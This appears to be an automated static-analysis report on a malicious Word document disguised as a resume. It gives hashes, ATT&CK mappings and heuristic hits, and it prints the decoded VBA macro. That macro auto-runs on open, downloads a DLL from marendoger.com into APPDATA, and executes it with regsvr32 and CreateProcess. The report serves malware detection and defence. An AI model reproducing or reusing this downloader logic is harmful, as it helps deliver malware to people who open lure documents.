Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18698c5a6ff96d21…

MALICIOUS

Office (OLE)

Size: 175.5 KB   First seen: 2020-07-24
MD5: 9ba3275ac0e65b9cd4d5afa0adf401b4 SHA-1: 0360632cee9f04c2bd4cdea48f1f801e8a34e862 SHA-256: 18698c5a6ff96d21e7ca634a608f01a414ef6fbbd7c1b3bf0f2085c85374516e
Risk Score: 218

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample contains VBA macros, including an AutoOpen macro, which is a common technique for initial execution. The macro references the CreateProcess and URLDownloadToFile APIs, indicating an intent to download and execute a secondary payload. The embedded URL https://marendoger.com/team/rumba.php is the most likely source for this payload. The document body appears to be a resume, likely used as a lure.

Heuristics 8

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    ' Line #87:
    '  LitStr 0x0010 "regsvr32.exe /s "
    '  LitStr 0x0007 "APPDATA"
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    ' Line #78:
    '  FuncDefn (Sub AutoOpen())
    ' Line #79:
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    '  LitStr 0x0007 "APPDATA"
    '  ArgsLd Environ 0x0001
    '  LitStr 0x000F "\uCWOncHvBb.dll"
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL  Channel
    • https://marendoger.com/team/rumba.php  In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography  In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml  In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                 Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)    6235 bytes
SHA-256: 9224685c3a9cbe6f3e8277a02e4505f54b26eba9c4dd29c5cfb18d49ef844020
Preview script
First 1,000 lines of the extracted script
Sub b()

End Sub
Sub b()

End Sub
' Processing file: /tmp/qstore_67coyahz
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 962 bytes
' Macros/VBA/Module1 - 5114 bytes
' Line #0:
' Line #1:
' 	Option  (Explicit)
' Line #2:
' Line #3:
' 	Dim (Private Const) 
' 	LitHI4 0x0020 0x0000 
' 	VarDefn NORMAL_PRIORITY_CLASS
' Line #4:
' 	Dim (Private Const) 
' 	LitDI4 0x0001 0x0000 
' 	UMi 
' 	VarDefn EPMVEjewph
' Line #5:
' 	Dim (Private Const) 
' 	LitHI4 0x0000 0x0800 
' 	VarDefn olQcGUTau
' Line #6:
' Line #7:
' 	Type (Private) STARTUPINFO
' Line #8:
' 	DimImplicit 
' 	VarDefn cb (As Long)
' Line #9:
' 	DimImplicit 
' 	VarDefn lpReserved (As String)
' Line #10:
' 	DimImplicit 
' 	VarDefn lpDesktop (As String)
' Line #11:
' 	DimImplicit 
' 	VarDefn lpTitle (As String)
' Line #12:
' 	DimImplicit 
' 	VarDefn dwX (As Long)
' Line #13:
' 	DimImplicit 
' 	VarDefn dwY (As Long)
' Line #14:
' 	DimImplicit 
' 	VarDefn dwXSize (As Long)
' Line #15:
' 	DimImplicit 
' 	VarDefn dwYSize (As Long)
' Line #16:
' 	DimImplicit 
' 	VarDefn dwXCountChars (As Long)
' Line #17:
' 	DimImplicit 
' 	VarDefn dwYCountChars (As Long)
' Line #18:
' 	DimImplicit 
' 	VarDefn dwFillAttribute (As Long)
' Line #19:
' 	DimImplicit 
' 	VarDefn dwFlags (As Long)
' Line #20:
' 	DimImplicit 
' 	VarDefn wShowWindow (As Integer)
' Line #21:
' 	DimImplicit 
' 	VarDefn cbReserved2 (As Integer)
' Line #22:
' 	DimImplicit 
' 	VarDefn lpReserved2 (As Long)
' Line #23:
' 	DimImplicit 
' 	VarDefn hStdInput (As Long)
' Line #24:
' 	DimImplicit 
' 	VarDefn hStdOutput (As Long)
' Line #25:
' 	DimImplicit 
' 	VarDefn hStdError (As Long)
' Line #26:
' 	EndType 
' Line #27:
' Line #28:
' 	Type (Private) PROCESS_INFORMATION
' Line #29:
' 	DimImplicit 
' 	VarDefn hProcess (As Long)
' Line #30:
' 	DimImplicit 
' 	VarDefn hThread (As Long)
' Line #31:
' 	DimImplicit 
' 	VarDefn dwProcessID (As Long)
' Line #32:
' 	DimImplicit 
' 	VarDefn dwThreadID (As Long)
' Line #33:
' 	EndType 
' Line #34:
' Line #35:
' Line #36:
' Line #37:
' Line #38:
' 	LineCont 0x0004 14 00 04 00
' 	FuncDefn (Private Declare PtrSafe Function IgriBCVf Lib "urlmon" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long)
' Line #39:
' Line #40:
' Line #41:
' Line #42:
' 	FuncDefn (Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32.dll" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long)
' Line #43:
' 	FuncDefn (Private Declare PtrSafe Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long)
' Line #44:
' 	LineCont 0x0014 10 00 00 00 18 00 00 00 21 00 00 00 2B 00 00 00 32 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function CreateProcessA Lib "kernel32.dll" (ByVal lpApplicationName As Long, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As , lpProcessInformation As ) As Long)
' Line #45:
' Line #46:
' Line #47:
' Line #48:
' Line #49:
' 	FuncDefn (Sub Mercedes())
' Line #50:
' Line #51:
' 	Dim 
' 	VarDefn ImageMy (As Shape)
' Line #52:
' Line #53:
' 	SetStmt 
' 	LitStr 0x0009 "Picture 3"
' 	Ld ActiveDocument 
' 	ArgsMemLd Shapes 0x0001 
' 	Set ImageMy 
' Line #54:
' Line #55:
' 	Ld ImageMy 
' 	ArgsMemCall Delete 0x0000 
' Line #56:
' Line #57:
' 	Dim 
' 	VarDefn obj (As Shape)
' Line #58:
' Line #59:
' 	SetStmt 
' 	LitStr 0x0009 "Picture 5"
' 	Ld ActiveDocument 
' 	ArgsMemLd Shapes 0x0001 
' 	Set obj 
' Line #60:
' Line #61:
' 	Ld obj 
' 	ArgsMemCall Delete 0x0000 
' Line #62:
' 	EndSub 
' Line #63:
' Line #64:
' Line #65:
' Line #66:
' 	FuncDefn (Sub TsszDqFNmimMsVoEWmL())
' Line #67:
' 	Dim 
' 	VarDefn kAKjmRBDUFbRadZx (As String)
' Line #68:
' Line #69:
' Line #70:
' 	LitStr 0x0025 "https://marendoger.com/team/rumba.php"
' 	St kAKjmRBDUFbRadZx 
' Line #71:
' Line #72:
' 	LitDI2 0x0000 
' 	Ld kAKjmRBDUFbRadZx 
' 	LitStr 0x0007 "APPDATA"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x000F "\uCWOncHvBb.dll"
' 	Concat 
' 	Coerce (Str) 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall IgriBCVf 0x0005 
' Line #73:
' 	ArgsCall Mercedes 0x0000 
' Line #74:
' 	EndSub 
' Line #75:
' Line #76:
' Line #77:
' Line #78:
' 	FuncDefn (Sub AutoOpen())
' Line #79:
' 	ArgsCall TsszDqFNmimMsVoEWmL 0x0000 
' Line #80:
' Line #81:
' Line #82:
' 	Dim 
' 	VarDefn oINPTOjiu (As PROCESS_INFORMATION)
' Line #83:
' 	Dim 
' 	VarDefn JGeonydTqpbGQ
' Line #84:
' 	Dim 
' 	VarDefn dLHLKAbruZGLB (As Long)
' Line #85:
' 	Dim 
' 	VarDefn SYxnJHzNMOcGc (As String)
' Line #86:
' Line #87:
' 	LitStr 0x0010 "regsvr32.exe /s "
' 	LitStr 0x0007 "APPDATA"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x000D "\uCWOncHvBb.d"
' 	Concat 
' 	LitStr 0x0002 "ll"
' 	Concat 
' 	Coerce (Str) 
' 	Concat 
' 	St SYxnJHzNMOcGc 
' Line #88:
' 	LitDI4 0x0000 0x0000 
' 	Ld SYxnJHzNMOcGc 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0001 0x0000 
' 	Ld olQcGUTau 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0000 0x0000 
' 	Ld JGeonydTqpbGQ 
' 	Ld oINPTOjiu 
' 	ArgsLd CreateProcessA 0x000A 
' 	St dLHLKAbruZGLB 
' Line #89:
' Line #90:
' Line #91:
' 	Ld oINPTOjiu 
' 	MemLd hProcess 
' 	Ld EPMVEjewph 
' 	ArgsCall WaitForSingleObject 0x0002 
' Line #92:
' Line #93:
' 	Ld dLHLKAbruZGLB 
' 	ArgsCall CloseHandle 0x0001 
' Line #94:
' Line #95:
' 	Dim 
' 	VarDefn owPxWNvZqRVmS (As Long)
' Line #96:
' Line #97:
' 	Dim 
' 	VarDefn iOJnDRNFqci (As String)
' Line #98:
' Line #99:
' 	LitStr 0x0007 "APPDATA"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x0023 "\Windows Media Player\wpvnetwks.exe"
' 	Concat 
' 	Coerce (Str) 
' 	St iOJnDRNFqci 
' Line #100:
' Line #101:
' 	LitDI4 0x0000 0x0000 
' 	Ld iOJnDRNFqci 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0001 0x0000 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0000 0x0000 
' 	Ld JGeonydTqpbGQ 
' 	Ld oINPTOjiu 
' 	ArgsLd CreateProcessA 0x000A 
' 	St owPxWNvZqRVmS 
' Line #102:
' Line #103:
' 	Ld owPxWNvZqRVmS 
' 	ArgsCall CloseHandle 0x0001 
' Line #104:
' Line #105:
' 	EndSub 
' Line #106:
' Line #107:
' Line #108:
' Line #109: